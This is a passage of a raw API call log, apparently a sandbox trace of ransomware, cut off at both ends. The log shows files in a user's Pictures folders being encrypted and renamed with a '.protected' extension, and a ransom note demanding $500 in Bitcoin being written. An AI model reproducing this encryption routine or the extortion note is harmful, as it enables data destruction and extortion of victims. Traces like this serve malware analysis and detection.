HALPmcxz\\Pictures\\o s0\\mcdRZy3ZI.png") returned 61 [0092.548] StrStrW (lpFirst="mcdRZy3ZI.png", lpSrch=".txt") returned 0x0 [0092.548] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\mcdRZy3ZI.png") returned 61 [0092.548] StrStrW (lpFirst="mcdRZy3ZI.png", lpSrch=".rar") returned 0x0 [0092.548] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\mcdRZy3ZI.png") returned 61 [0092.548] StrStrW (lpFirst="mcdRZy3ZI.png", lpSrch=".zip") returned 0x0 [0092.548] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.549] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.549] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.549] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.549] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.549] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.549] CloseHandle (hObject=0xd4) returned 1 [0092.550] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\mcdRZy3ZI.png.protected") returned 71 [0092.550] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\mcdRZy3ZI.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\mcdrzy3zi.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\mcdRZy3ZI.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\mcdrzy3zi.png.protected")) returned 1 [0092.551] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.551] lstrcmpiW (lpString1="xmlrLF1ziUq2QqA Pzqs.gif", lpString2="Windows") returned 1 [0092.551] lstrcmpiW (lpString1="xmlrLF1ziUq2QqA Pzqs.gif", lpString2="Program Files") returned 1 [0092.551] lstrcmpiW (lpString1="xmlrLF1ziUq2QqA Pzqs.gif", lpString2="Program Files (x86)") returned 1 [0092.551] lstrcmpiW (lpString1="xmlrLF1ziUq2QqA Pzqs.gif", lpString2="$Recycle.bin") returned 1 [0092.551] lstrcmpiW (lpString1="xmlrLF1ziUq2QqA Pzqs.gif", lpString2="System Volume Information") returned 1 [0092.551] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\xmlrLF1ziUq2QqA Pzqs.gif") returned 72 [0092.551] StrStrIW (lpFirst="xmlrLF1ziUq2QqA Pzqs.gif", lpSrch=".protected") returned 0x0 [0092.551] lstrcmpW (lpString1="xmlrLF1ziUq2QqA Pzqs.gif", lpString2="RESTORE_FILES.txt") returned 1 [0092.551] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.551] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.551] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\xmlrLF1ziUq2QqA Pzqs.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\xmlrlf1ziuq2qqa pzqs.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.551] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\xmlrLF1ziUq2QqA Pzqs.gif") returned 72 [0092.551] StrStrW (lpFirst="xmlrLF1ziUq2QqA Pzqs.gif", lpSrch=".txt") returned 0x0 [0092.551] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\xmlrLF1ziUq2QqA Pzqs.gif") returned 72 [0092.551] StrStrW (lpFirst="xmlrLF1ziUq2QqA Pzqs.gif", lpSrch=".rar") returned 0x0 [0092.551] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\xmlrLF1ziUq2QqA Pzqs.gif") returned 72 [0092.551] StrStrW (lpFirst="xmlrLF1ziUq2QqA Pzqs.gif", lpSrch=".zip") returned 0x0 [0092.551] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x7cb, lpOverlapped=0x0) returned 1 [0092.552] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xfffff835, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.552] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x7cb, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x7cb, lpOverlapped=0x0) returned 1 [0092.552] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.553] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.553] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.553] CloseHandle (hObject=0xd4) returned 1 [0092.553] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\xmlrLF1ziUq2QqA Pzqs.gif.protected") returned 82 [0092.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\xmlrLF1ziUq2QqA Pzqs.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\xmlrlf1ziuq2qqa pzqs.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\xmlrLF1ziUq2QqA Pzqs.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\xmlrlf1ziuq2qqa pzqs.gif.protected")) returned 1 [0092.554] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0092.554] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0092.554] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\RESTORE_FILES.txt") returned 65 [0092.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.555] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.555] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0092.556] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.556] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0092.556] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.556] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0092.556] CloseHandle (hObject=0xb4) returned 1 [0092.557] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.557] lstrcmpiW (lpString1="p-m8kwix.bmp", lpString2="Windows") returned -1 [0092.557] lstrcmpiW (lpString1="p-m8kwix.bmp", lpString2="Program Files") returned -1 [0092.557] lstrcmpiW (lpString1="p-m8kwix.bmp", lpString2="Program Files (x86)") returned -1 [0092.557] lstrcmpiW (lpString1="p-m8kwix.bmp", lpString2="$Recycle.bin") returned 1 [0092.557] lstrcmpiW (lpString1="p-m8kwix.bmp", lpString2="System Volume Information") returned -1 [0092.557] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\p-m8kwix.bmp") returned 55 [0092.557] StrStrIW (lpFirst="p-m8kwix.bmp", lpSrch=".protected") returned 0x0 [0092.557] lstrcmpW (lpString1="p-m8kwix.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0092.557] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.557] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\p-m8kwix.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\p-m8kwix.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\p-m8kwix.bmp") returned 55 [0092.558] StrStrW (lpFirst="p-m8kwix.bmp", lpSrch=".txt") returned 0x0 [0092.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\p-m8kwix.bmp") returned 55 [0092.558] StrStrW (lpFirst="p-m8kwix.bmp", lpSrch=".rar") returned 0x0 [0092.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\p-m8kwix.bmp") returned 55 [0092.558] StrStrW (lpFirst="p-m8kwix.bmp", lpSrch=".zip") returned 0x0 [0092.558] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.559] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.559] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.560] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.560] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.560] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.560] CloseHandle (hObject=0xb4) returned 1 [0092.560] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\p-m8kwix.bmp.protected") returned 65 [0092.560] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\p-m8kwix.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\p-m8kwix.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\p-m8kwix.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\p-m8kwix.bmp.protected")) returned 1 [0092.562] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.562] lstrcmpiW (lpString1="qDNUfsmEozG2hmfeOlO", lpString2="Windows") returned -1 [0092.562] lstrcmpiW (lpString1="qDNUfsmEozG2hmfeOlO", lpString2="Program Files") returned 1 [0092.562] lstrcmpiW (lpString1="qDNUfsmEozG2hmfeOlO", lpString2="Program Files (x86)") returned 1 [0092.562] lstrcmpiW (lpString1="qDNUfsmEozG2hmfeOlO", lpString2="$Recycle.bin") returned 1 [0092.562] lstrcmpiW (lpString1="qDNUfsmEozG2hmfeOlO", lpString2="System Volume Information") returned -1 [0092.562] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO") returned 62 [0092.562] lstrcmpW (lpString1="qDNUfsmEozG2hmfeOlO", lpString2=".") returned 1 [0092.562] lstrcmpW (lpString1="qDNUfsmEozG2hmfeOlO", lpString2="..") returned 1 [0092.562] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\*") returned 64 [0092.562] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0092.562] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.562] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.562] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.562] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.563] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.563] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\.") returned 64 [0092.563] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.563] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.563] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.563] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.563] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.563] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.563] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.563] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\..") returned 65 [0092.563] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.563] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.563] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.563] lstrcmpiW (lpString1="gPVKT3GsVOZSJb.bmp", lpString2="Windows") returned -1 [0092.563] lstrcmpiW (lpString1="gPVKT3GsVOZSJb.bmp", lpString2="Program Files") returned -1 [0092.563] lstrcmpiW (lpString1="gPVKT3GsVOZSJb.bmp", lpString2="Program Files (x86)") returned -1 [0092.563] lstrcmpiW (lpString1="gPVKT3GsVOZSJb.bmp", lpString2="$Recycle.bin") returned 1 [0092.563] lstrcmpiW (lpString1="gPVKT3GsVOZSJb.bmp", lpString2="System Volume Information") returned -1 [0092.563] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\gPVKT3GsVOZSJb.bmp") returned 81 [0092.563] StrStrIW (lpFirst="gPVKT3GsVOZSJb.bmp", lpSrch=".protected") returned 0x0 [0092.563] lstrcmpW (lpString1="gPVKT3GsVOZSJb.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0092.563] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.563] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\gPVKT3GsVOZSJb.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\gpvkt3gsvozsjb.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.564] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\gPVKT3GsVOZSJb.bmp") returned 81 [0092.564] StrStrW (lpFirst="gPVKT3GsVOZSJb.bmp", lpSrch=".txt") returned 0x0 [0092.564] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\gPVKT3GsVOZSJb.bmp") returned 81 [0092.564] StrStrW (lpFirst="gPVKT3GsVOZSJb.bmp", lpSrch=".rar") returned 0x0 [0092.564] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\gPVKT3GsVOZSJb.bmp") returned 81 [0092.564] StrStrW (lpFirst="gPVKT3GsVOZSJb.bmp", lpSrch=".zip") returned 0x0 [0092.564] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.565] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.565] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.565] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.565] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.565] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.565] CloseHandle (hObject=0xd4) returned 1 [0092.566] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\gPVKT3GsVOZSJb.bmp.protected") returned 91 [0092.566] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\gPVKT3GsVOZSJb.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\gpvkt3gsvozsjb.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\gPVKT3GsVOZSJb.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\gpvkt3gsvozsjb.bmp.protected")) returned 1 [0092.567] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.567] lstrcmpiW (lpString1="MYOVHx_w_H1c1t.gif", lpString2="Windows") returned -1 [0092.567] lstrcmpiW (lpString1="MYOVHx_w_H1c1t.gif", lpString2="Program Files") returned -1 [0092.567] lstrcmpiW (lpString1="MYOVHx_w_H1c1t.gif", lpString2="Program Files (x86)") returned -1 [0092.567] lstrcmpiW (lpString1="MYOVHx_w_H1c1t.gif", lpString2="$Recycle.bin") returned 1 [0092.567] lstrcmpiW (lpString1="MYOVHx_w_H1c1t.gif", lpString2="System Volume Information") returned -1 [0092.567] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\MYOVHx_w_H1c1t.gif") returned 81 [0092.567] StrStrIW (lpFirst="MYOVHx_w_H1c1t.gif", lpSrch=".protected") returned 0x0 [0092.567] lstrcmpW (lpString1="MYOVHx_w_H1c1t.gif", lpString2="RESTORE_FILES.txt") returned -1 [0092.567] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.567] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.567] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\MYOVHx_w_H1c1t.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\myovhx_w_h1c1t.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.568] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\MYOVHx_w_H1c1t.gif") returned 81 [0092.568] StrStrW (lpFirst="MYOVHx_w_H1c1t.gif", lpSrch=".txt") returned 0x0 [0092.568] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\MYOVHx_w_H1c1t.gif") returned 81 [0092.568] StrStrW (lpFirst="MYOVHx_w_H1c1t.gif", lpSrch=".rar") returned 